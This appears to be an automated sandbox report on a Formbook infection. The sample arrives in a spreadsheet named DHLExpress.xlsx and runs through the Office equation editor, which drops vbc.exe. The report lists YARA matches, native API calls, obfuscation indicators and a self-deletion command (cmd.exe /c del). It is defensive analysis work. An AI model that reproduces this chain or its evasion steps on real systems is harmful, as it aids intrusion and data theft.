Source: 00000007.00000002.670529707.00000000002C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.670529707.00000000002C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.505237458.00000000003D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.505237458.00000000003D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.670482603.0000000000290000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.670482603.0000000000290000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.505715407.00000000023E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.505715407.00000000023E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.467163714.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.467163714.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.505257053.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.505257053.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.496333935.0000000009552000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.496333935.0000000009552000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.466568684.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.466568684.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.465993067.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.465993067.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.465344167.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.465344167.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Contains functionality to shutdown / reboot the system
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 4_2_00403225
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040604C 4_2_0040604C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404772 4_2_00404772
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C062 5_2_0041C062
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B92A 5_2_0041B92A
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C2B0 5_2_0041C2B0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CB69 5_2_0041CB69
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C7B 5_2_00408C7B
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041BCFD 5_2_0041BCFD
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C80 5_2_00408C80
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D88 5_2_00402D88
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CF88 5_2_0041CF88
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075905A 5_2_0075905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00743040 5_2_00743040
Source: C:\Users\Public\vbc.exe Code function: 5_2_0076D005 5_2_0076D005
Source: C:\Users\Public\vbc.exe Code function: 5_2_0073E0C6 5_2_0073E0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_007E1238 5_2_007E1238
Source: C:\Users\Public\vbc.exe Code function: 5_2_0073E2E9 5_2_0073E2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_0078A37B 5_2_0078A37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00747353 5_2_00747353
Source: C:\Users\Public\vbc.exe Code function: 5_2_00742305 5_2_00742305
Source: C:\Users\Public\vbc.exe Code function: 5_2_007663DB 5_2_007663DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_0073F3CF 5_2_0073F3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_007E63BF 5_2_007E63BF
Source: C:\Users\Public\vbc.exe Code function: 5_2_0077D47D 5_2_0077D47D
Source: C:\Users\Public\vbc.exe Code function: 5_2_007C443E 5_2_007C443E
Source: C:\Users\Public\vbc.exe Code function: 5_2_00775485 5_2_00775485
Source: C:\Users\Public\vbc.exe Code function: 5_2_00751489 5_2_00751489
Source: C:\Users\Public\vbc.exe Code function: 5_2_00786540 5_2_00786540
Source: C:\Users\Public\vbc.exe Code function: 5_2_0074351F 5_2_0074351F
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075C5F0 5_2_0075C5F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0078A634 5_2_0078A634
Source: C:\Users\Public\vbc.exe Code function: 5_2_007E2622 5_2_007E2622
Source: C:\Users\Public\vbc.exe Code function: 5_2_0074E6C1 5_2_0074E6C1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00744680 5_2_00744680
Source: C:\Users\Public\vbc.exe Code function: 5_2_007757C3 5_2_007757C3
Source: C:\Users\Public\vbc.exe Code function: 5_2_0074C7BC 5_2_0074C7BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_007C579A 5_2_007C579A
Source: C:\Users\Public\vbc.exe Code function: 5_2_0076286D 5_2_0076286D
Source: C:\Users\Public\vbc.exe Code function: 5_2_0074C85C 5_2_0074C85C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3CB210 7_2_4A3CB210
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3D12D2 7_2_4A3D12D2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3CE46C 7_2_4A3CE46C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3D39B6 7_2_4A3D39B6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02491238 7_2_02491238
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023EE2E9 7_2_023EE2E9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0243A37B 7_2_0243A37B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023F2305 7_2_023F2305
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023F7353 7_2_023F7353
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_024163DB 7_2_024163DB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023EF3CF 7_2_023EF3CF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_024963BF 7_2_024963BF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0240905A 7_2_0240905A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0241D005 7_2_0241D005
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023F3040 7_2_023F3040
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023EE0C6 7_2_023EE0C6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02492622 7_2_02492622
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0243A634 7_2_0243A634
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023F4680 7_2_023F4680
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023FE6C1 7_2_023FE6C1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_024257C3 7_2_024257C3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023FC7BC 7_2_023FC7BC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0247579A 7_2_0247579A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0242D47D 7_2_0242D47D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02425485 7_2_02425485
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02401489 7_2_02401489
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02436540 7_2_02436540
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023F351F 7_2_023F351F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0240C5F0 7_2_0240C5F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_024A3A83 7_2_024A3A83
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02417B00 7_2_02417B00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0247DBDA 7_2_0247DBDA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023EFBD7 7_2_023EFBD7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0249CBA4 7_2_0249CBA4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0241286D 7_2_0241286D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023FC85C 7_2_023FC85C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0248F8EE 7_2_0248F8EE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02475955 7_2_02475955
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 007AF970 appears 42 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00783F92 appears 70 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0078373B appears 117 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0073DF5C appears 66 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 0243373B appears 162 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 023EDF5C appears 90 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 02433F92 appears 82 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 0245F970 appears 65 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 5_2_004185E0 NtCreateFile, 5_2_004185E0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418690 NtReadFile, 5_2_00418690
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418710 NtClose, 5_2_00418710
Source: C:\Users\Public\vbc.exe Code function: 5_2_004187C0 NtAllocateVirtualMemory, 5_2_004187C0
Source: C:\Users\Public\vbc.exe Code function: 5_2_004185DB NtCreateFile, 5_2_004185DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418632 NtCreateFile, 5_2_00418632
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041870B NtClose, 5_2_0041870B
Source: C:\Users\Public\vbc.exe Code function: 5_2_004187BF NtAllocateVirtualMemory, 5_2_004187BF
Source: C:\Users\Public\vbc.exe Code function: 5_2_00730078 NtResumeThread,LdrInitializeThunk, 5_2_00730078
Source: C:\Users\Public\vbc.exe Code function: 5_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00730048
Source: C:\Users\Public\vbc.exe Code function: 5_2_007300C4 NtCreateFile,LdrInitializeThunk, 5_2_007300C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_007307AC NtCreateMutant,LdrInitializeThunk, 5_2_007307AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0072F900 NtReadFile,LdrInitializeThunk, 5_2_0072F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_0072F9F0 NtClose,LdrInitializeThunk, 5_2_0072F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0072FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0072FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0072FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0072FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0072FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0072FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0072FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0072FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0072FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0072FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0072FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0072FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0072FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00730060 NtQuerySection, 5_2_00730060
Source: C:\Users\Public\vbc.exe Code function: 5_2_007310D0 NtOpenProcessToken, 5_2_007310D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00731148 NtOpenThread, 5_2_00731148
Source: C:\Users\Public\vbc.exe Code function: 5_2_0073010C NtOpenDirectoryObject, 5_2_0073010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_007301D4 NtSetValueKey, 5_2_007301D4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3E1E5F SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 7_2_4A3E1E5F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3CC2A6 NtQueryInformationToken,GetCPInfo,NtQueryInformationToken,GetCPInfo,NtQueryInformationToken, 7_2_4A3CC2A6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3DF6CF NtSetInformationProcess,GetFileAttributesW,_get_osfhandle,SetEndOfFile, 7_2_4A3DF6CF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3D18A6 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 7_2_4A3D18A6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3CC48A GetCPInfo,NtOpenThreadToken,NtOpenProcessToken,GetCPInfo,NtClose, 7_2_4A3CC48A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3CC52D NtQueryInformationToken, 7_2_4A3CC52D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023E00C4 NtCreateFile,LdrInitializeThunk, 7_2_023E00C4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023E07AC NtCreateMutant,LdrInitializeThunk, 7_2_023E07AC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DFAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_023DFAE8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DFB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_023DFB68
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DFB50 NtCreateKey,LdrInitializeThunk, 7_2_023DFB50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DFBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_023DFBB8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DF900 NtReadFile,LdrInitializeThunk, 7_2_023DF900
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DF9F0 NtClose,LdrInitializeThunk, 7_2_023DF9F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_023DFED0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DFFB4 NtCreateSection,LdrInitializeThunk, 7_2_023DFFB4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DFC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_023DFC60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DFD8C NtDelayExecution,LdrInitializeThunk, 7_2_023DFD8C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DFDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_023DFDC0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023E0078 NtResumeThread, 7_2_023E0078
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023E0060 NtQuerySection, 7_2_023E0060
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023E0048 NtProtectVirtualMemory, 7_2_023E0048
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023E10D0 NtOpenProcessToken, 7_2_023E10D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023E010C NtOpenDirectoryObject, 7_2_023E010C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023E1148 NtOpenThread, 7_2_023E1148
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023E01D4 NtSetValueKey, 7_2_023E01D4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DFA20 NtQueryInformationFile, 7_2_023DFA20
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DFA50 NtEnumerateValueKey, 7_2_023DFA50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DFAB8 NtQueryValueKey, 7_2_023DFAB8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DFAD0 NtAllocateVirtualMemory, 7_2_023DFAD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DFBE8 NtQueryVirtualMemory, 7_2_023DFBE8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DF8CC NtWaitForSingleObject, 7_2_023DF8CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023DF938 NtWriteFile, 7_2_023DF938
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023E1930 NtSetContextThread, 7_2_023E1930
Contains functionality to communicate with device drivers
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3CA902: CreateFileW,DeviceIoControl,memcpy,CloseHandle,FindFirstStreamW,FindNextStreamW,FindClose, 7_2_4A3CA902
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: DHLExpress.xlsx ReversingLabs: Detection: 32%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$DHLExpress.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE030.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/22@6/6
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar, 4_2_00402012
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 4_2_00404275
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.504155697.000000000028C000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.468159322.0000000000590000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.505533328.00000000008A0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.466750651.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.505403506.0000000000720000.00000040.00000001.sdmp, cmd.exe
Source: Binary string: cmd.pdb,$>J6$>J@$>J source: vbc.exe, 00000005.00000002.505732273.0000000002410000.00000040.00020000.sdmp, vbc.exe, 00000005.00000003.504182162.00000000002CA000.00000004.00000001.sdmp
Source: Binary string: cmd.pdb source: vbc.exe, 00000005.00000002.505732273.0000000002410000.00000040.00020000.sdmp, vbc.exe, 00000005.00000003.504155697.000000000028C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.504182162.00000000002CA000.00000004.00000001.sdmp, cmd.exe

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_73231000 push eax; ret 4_2_7323102E
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041504B push ds; iretd 5_2_0041504C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B822 push eax; ret 5_2_0041B828
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B82B push eax; ret 5_2_0041B892
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B88C push eax; ret 5_2_0041B892
Source: C:\Users\Public\vbc.exe Code function: 5_2_00416239 push esi; retf 5_2_0041623B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00415AE6 push ecx; retf 5_2_00415B02
Source: C:\Users\Public\vbc.exe Code function: 5_2_00415AF0 push ecx; retf 5_2_00415B02
Source: C:\Users\Public\vbc.exe Code function: 5_2_004162A9 push esi; retf 5_2_0041623B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00415401 push cs; retf 5_2_00415405
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041BCFD push dword ptr [4E2C34C0h]; ret 5_2_0041C058
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B7D5 push eax; ret 5_2_0041B828
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3C13B6 push ecx; ret 7_2_4A3C13C9
Contains functionality to dynamically determine API calls
